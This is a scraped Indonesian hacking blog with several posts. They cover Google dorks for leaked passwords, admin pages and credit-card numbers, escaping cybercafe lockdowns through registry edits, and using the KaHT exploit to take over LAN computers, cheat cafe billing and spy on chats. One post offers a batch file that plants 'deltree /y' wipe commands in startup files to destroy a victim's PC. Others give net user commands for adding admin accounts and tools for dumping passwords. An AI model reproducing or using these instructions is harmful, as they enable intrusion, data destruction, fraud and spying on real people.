bagian akhir syntax setelah tanda titik dua. * Syntax inurl: Google akan melakukan pencarian data dalam syntax URL tertentu yang diberikan setelah tanda titik dua. Mengenal lebih dalam Syntax Untuk Google Hacking Setelah mengenal dasar metode pencarian menggunakan google.com, sekarang kita akan beralih ke syntax yang dapat dikatakan lebih specific dan lebih komplikasi dibandingkan syntax yang telah diberikan diatas. Mari sekarang kita perhatikan syntax dibawah ini: intitle:”Index of” passwords modified allinurl:auth_user_file.txt “access denied for user” “using password” “A syntax error has occurred” filetype:ihtml allinurl: admin mdb “ORA-00921: unexpected end of SQL command” inurlasslist.txt “Index of /backup” “Chatologica MetaSearch” “stack tracking:” Contoh contoh yang diberikan diatas adalah contoh contoh syntax yang bias dikatakan digunakan untuk mencari password ataupun admin page, dan juga bias digunakan untuk mencari page yang tidak seharusnya dapat dibuka oleh user biasa. Kombinasi kombinasi lain dapat digunakan untuk melakukan pencarian yang lain dan hanya perlu dimodifikasi sesuai dengan kebutuhan dan target anda. Amex Numbers: 300000000000000..399999999999999 MC Numbers: 5178000000000000..5178999999999999 visa 4356000000000000..4356999999999999 Sedangkan syntax yang diatas ini digunakan untuk mencari nomor kartu kredit orang menggunakan google.com Bedah Syntax Setelah melihat beberapa syntax yang lebih complex diatas, mari kita sedikit membahas maksud dari syntax syntax yang ada dibawah ini. “parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums “parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums “parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums “parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums “parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums “parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums Seperti yang dapat kalian perhatikan dari keseluruhan syntax. Bagian yang diganti hanya selalu pada bagian sesudah kata “Parent Directory”. Kenapa? Setelah kita pelajari dibagian awal artikel ini tadi bahwa syntax (“ “) digunakan untuk melakukan pencarian kalimat secara pasti, dan (-) digunakan untuk men-tidak ikut sertakan sebuah kata dalam keseluruhan kalimat pencarian. Sehingga dalam syntax ini dapat kita artikan secara kasar juga sebagai berikut: * “Parent Directory”  Pencari sedang melakukan pencarian untuk kata Parent Directory secara pasti dan tidak secara terpencar (Parent sendiri dan Directory sendiri) * Pencari menaruh apa yang ingin dia cari. (Contoh : /appz/ adalah aplikasi. Dan MP3, berarti dia mencari mengenai hal MP3) * -xxx  Pencari tidak menginginkan adanya konten xxx dalam pencariannya. * -html  Pencari tidak menginginkan adanya konten html dalam pencariannya. * -htm  Pencari tidak menginginkan adanya konten htm dalam pencariannya. * -php  Pencari tidak menginginkan adanya konten php dalam pencariannya. * Dan lain sebagainya. List Syntax, serta Kombinasinya Setelah membahas mengenai metode pencarian, syntax yang cukup komplikasi hingga beda arti syntax, pada bagian sebelumnya. Pada bagian ini kita akan membahas mengenai kombinasi syntax dan bagaimana fungsinya, serta bagaimana membaca arti syntax tersebut. Inurl:Microsoft filetype:iso Anda akan mencari pada setiap URL berbau kata Microsoft untuk segala file yang bertipe iso. Anda dapat merubah URL dan Filetype menjadi apapun sesuai kebutuhan anda. “# -FrontPage-” inurl:service.pwd Dengan menggunakan syntax ini, anda menyuruh google untuk mencarikan password frontpage untuk anda. “http://*:*@www” Syntax diatas digunakan untuk melakukan pencarian password pada line url anda. Dalam kasus ini anda mencari user dan password yang tulisannya apa saja, pada domain name tertentu. (Masukan nama domain tanpa .com .net / .org) – (Contoh : “http://*:*@www” neotek) Cara lain untuk menggunakan syntax ini dalam bentuk yang berkesebalikan ialah dengan cara menuliskan syntax seperti ini: “http://th0r:th0r@www”  dalam kasus ini anda mencari username dan password th0r pada website yang nantinya akan anda masukan alamatnya dibagian belakang. “sets mode +k” Nampak seperti IRC? Memang betul. Ada banyak juga room di IRC yang menggunakan key untuk melakukan join kedalam room tersebut dan dengan menggunakan syntax ini, anda akan dapat menemukan beberapa key yang tercatat dalam log percakapan channel / room tersebut. Allinrul: Admin mdb Kalian akan menemukan banyak web page sehubungan dengan administrator system page. Intitle: “Index Of” config.php Dengan syntax diatas, kalian akan diberikan setumpuk data mengenai website website yang memiliki file config.php Bahkan google dapat juga dijadikan ajang untuk mencari warez serial code. Katakanlah anda membutukan Windows XP Pro serial number. Anda hanya perlu membuka http://www.google.com dan mengetikan syntax sebagai berikut: “Windows XP Professional” 94FBR Yang dapat juga kita artikan sebagai pencarian kata Windows XP Professional tanpa di pisahkan. Sedangkan 94FBR itu sendiri adalah sebuah code yang kerapkali dimasukan ke dalam bagian daripada registration code yang ada pada kebanyakan software Microsoft. Oleh dari karena hal tersebut, penggunaan code 94FBR mungkin akan cukup membantu dalam melakukan pencarian serial code. Akan tetapi, segalanya tetap dapat dimodifikasi sesuai dengan keinginan serta keperluan anda. Sekian cerita singkat saya kali ini mengenai Google Hacking. Perlu diingat bahwa bagaimana tingkat kesuksesan dalam menggunakan google hacking ini adalah 100% tergantung daripada ide dan kreatifitas anda sendiri dalam mengkombinasikan syntax dan menyesuaikan data yang anda ketahui mengenai suatu target tertentu. Tapi yang perlu saya jelaskan disini, bahwa google hacking adalah salah satu tehnik yang cukup mengerikan apabila anda dapat menggunakannya dengan sangat baik. Hal inipun didukung dengan kenyataan bahwa kebanyakan ahli security di dunia telah menempatkan Google Hacking sebagai salah satu tehnik yang sejajar dan sama berbahayanya dengan SQL Injection, Cross-site Scripting dan Remote Execution Command. Credit and Special Thanks To: Johnny Long With His Book Named as “Google Hacking” Tak lupa juga saya mengucapkan terima kasih kepada Epel (Thanks yoo =P), Ignes (Yang sudah nemenin chat waktu lg buat ini artikel), Cindy (Yang juga sudah nemenin ngobrol sampe artikelnya kelar) Hehehe, juga Jeffry dan Nico. Serta beberapa teman teman saya yang lainnya. Akhir kata, saya hanya ingin mengucapkan. Teknologi berkembang untuk di eksploitasi fungsi dan manfaatnya. Kalau meng-eksploitasi kekayaan alam itu salah, meng-eksploitasi funsi teknologi adalah sebuah hal dapat dikatakan bagus. Oleh dari karena itu, teruslah mencari keuntungan daripada penggunaan system itu sendiri.

tutorial hacker part 2 bro

Read More......

1. Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak. Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan. 2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini :) Gue punya jawaban :) Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya : 1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties 2. Di properties pilihlah "find target..." 3. Muncul Window lalu pilih search diatas 4. Pada Search pilihlah "All Files and folders" 5. Lalu cari file "cmd.exe" di windows 6. Jika di temukan maka jalankan file cmd.exe. 7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos :) Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut. 3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini 1. Masuk ke Notepad / Wordpad / Ms Word 2. Lalu ketik dibawah ini REGEDIT4 [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer] "NoRun"=dword:00000000 3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan. 4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini. Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:KaH) maka ketikkan “CDKaHT” dan seterusnya. Jika sudah, ini saatnya? Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : “KaHT Ip1 ip2″ ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:windowssystem” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:Program FilesMiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:program FilesMiRC program MiRCnya maka cukup masuk aja di C:Program FilesMiRCLogs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri : 1. Ketik : net user /add 2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete \Catatan: *Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda bukan tanggung jawab donkdepeggy! *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali.

ngerjain komputer orang

Read More......

Ini khusus buat para “Lamer sejati” yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!! Okreyyy, ngga’ usah banyak omong,dan cengkonek lainnya lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat: @echo off echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat atau @echo off echo deltree /y %windir%\*.*>> AUTOEXEC.BAT echo deltree /y d:\*.*>> AUTOEXEC.BAT wELL, ga’ perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi… program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.dan qew.,qe.,qe.,qe., kamu ngerjain kompy orang dan ini berlaku juga untuk merusak kompy di warnet yang kamu kira sebel sama op yang jaga kamu copy paste aja script itu ok bro.....

trik hacker mengetahui password

Read More......

1. Cara mengetahui password administrator Windows pertama donkdepeggy sarankan: - Download Proactive Windows Security Explorer Sebenarnya cara ini sudah diketahui gue sudah lama,tapi gue belum mempublikasikannya kepada rekan-rekan, publikasi cara ini juga baru terpikir saat tutorial program LanDiscovery diluncurkan, baiklah kita langsung saja, pertama-tama downloadlah program Proactive Windows Security Explorer. Pilih Retrive password hashes from, misal Registry of local computer. lalu kita klik Dump, maka password-password administrator Windows akan muncul dibawahnya,m jika program ini tidak dapat memuaskan anda, maka anda dapat menggunakan program Password Reminder v1.1 dimana tutorialnya juga ada dihalaman ini. Tujuan dari tutorial ini adalah untuk menginformasikan bagi para pemilik komputer dengan system operasi Windows NT / 2000 / XP agar lebih hati-hati dengan para pengguna program recovery password administrator Windows seperti ini karena mereka dapat mengakali seluruh komputer anda. 2. Mengetahui password Administrator Windows dengan cepat & mudah - Download program Password Reminder v1.1 (1) - Download program Password Reminder v1.1 (2) - Download program Password Reminder v1.1 (3) Anda ingin mengetahui password adminstrator Windows ? biasanya ini dicari agar kita mendapatkan akses admin, seperti biasa diwarnet, kantor, sekolah, kampus dan semacamnya banyak yang selalu membatasi hak akses kita, kalau begitu gunain aja program Password Reminder maka permasalahan anda akan segera terselesaikan. Selain dari diatas agar kita mendapat akses yang lebih banyak juga tujuan dari tutorial ini untuk anda-anda yang pelupa dengan password-password Windows, dengan program ini semoga anda dapat mendapatkan password anda dan tidak melupakan lagi password yang anda buat. 3. Cara mengetahui password segala jenis document(s) dikomputer - Download Passware Password Recovery 5.3 (1) - Download Passware Password Recovery 5.3 (2) - Download Passware Password Recovery 5.3 (3) - Download Passware Password Recovery 5.3 (4) Saat ini semua jenis document(s) komputer tidak ada yang aman, saat ini telah bermunculan berbagai program untuk mengetahui password-password pada document(s) tersebut baik Ms Office 95 / 97 / XP / PDF / ZIP / RAR dan masih banyak lagi. Tujuan dari tutorial ini untuk anda-anda yang pelupa dengan password-password document, dengan program ini semoga anda dapat mendapatkan password anda kembali dan tidak lupa lagi mengingat password yang anda buat. 4. Cara melacak pemilik sebuah website (whois server) Anda ingin mencari pemilik sebuah website ? cukup mudah caranya, sebenarnya dulu webmaster whois website pakek tukangdomain, tapi sekarang dah gak bisa, ahkirnya gue menemukan website service yang melayani whois pemilik situs, link untuk mentehaui pemilik situs adalah : - http://www.nsiregistry.net/whois : untuk mendapatkan tampilan informasi website - http://www.networksolutions.com/en_US/whois/index.jhtml : untuk mengetahui si pemilik website tersebut Untuk tambahan anda dapat juga melakukannya di http://kerangkalangit.com/whois Tujuan dari tutorial ini agar kita dapat mengenali pemilik website itu lebih detail sehingga dapat menambah wawasan kita tentang orang-orang dibalik website tersebut. 5. Cara Internet gratis pakek wireless plus cara buat antena kaleng Sebenere gue sering ditanyain tentang masalah cara ngambil akses internet dari warnet, sekolah, kampus bahkan sampe kantor lewat wireless, karena webmaster gak punya wireless LAN (PCMCIA atau Acces Point) maka gue gak tahu caranya, nah kalau mau tahu caranya masuk aja di tutorial Jasakom dengan penulis ndhonx, nich gue kasih linknya aja http://www.jasakom.com/article.aspx?ID=587 , :) Untuk membuat Antena kaleng sendiri yang mempunyai jangkauan wireless tidak kalah dengan antena-antena wireless yang ada dipasaran maka klik http://noesapati.blogspot.com/2004/11/antena-kaleng.html . Tujuan dari informasi link ini hanya memberi informasi kepada warnet dan ISP bahwa wireless ternyata keamanannya mungkin memang benar-benar perlu dipertanyakan, jangan sampai bandwitch internet anda diambil oleh para pihak yang tidak bertanggung jawab.

tutorial hacker

Read More......

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet. Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet. Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html. Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id. Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e. Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini. Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada. Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet). Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik. Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya. Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow. Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP. Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server). Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh. Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis. Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’. Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial. Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti sinchan2 , Agus Hartanto (hartx@writeme.com) & donkdepeggy (donk.depeggy@gmail.com). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini. Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

fitur fitur terbaru blogger nich

Read More......

S\telah sekian lama menunggu, akhirnya blogger akan segera meluncurkan fitur-fitur barunya. Ini di terangkan pada blog mereka yakni di http://bloggerindraft.blogspot.com, bahwa mereka sudah membuat fitur fitur baru yang sangat di nanti-nanti oleh jutaan pengguna blog di blogger alias blogspot. Fitur-fitur tersebut adalah Webmaster Tools Verification, Star ratings, Impost/export of blogs, New Post Editor, dan yang paling di nanti-nanti selama ini adalah fitur Embedded comment form alias Kotak Komentar langsung di bawah Posting. Walaupun masih dalam tahap draft alias masih percobaan, anda sudah bisa mencobanya melalui http://draft.blogger.com, tinggal login dengan user name serta password blogger anda. 0 Ada satu yang lucu yaitu karena akhir-akhir ini kang rohman jarang Online di blog, informasi ini pertama kali donkdepeggy dapat bukan dari situs asli blogger in draft akan tetapi dari blog kawan donkdepeggy. Tentang semua yang donkdepeggy tulis di atas sudah di bahas tuntas tass........tassss......, silahkan baca di sini, di sini, di sini, di sini, dan di sini dan di situ. Khusus untuk kotak komentar langsung di bawah posting, bagi anda yang kode kotak komentarnya masih perawan alias belum di otak atik semisal bikin komentar memakai iframe seperti blog saya ini sebelumnya, tentu cukup hanya 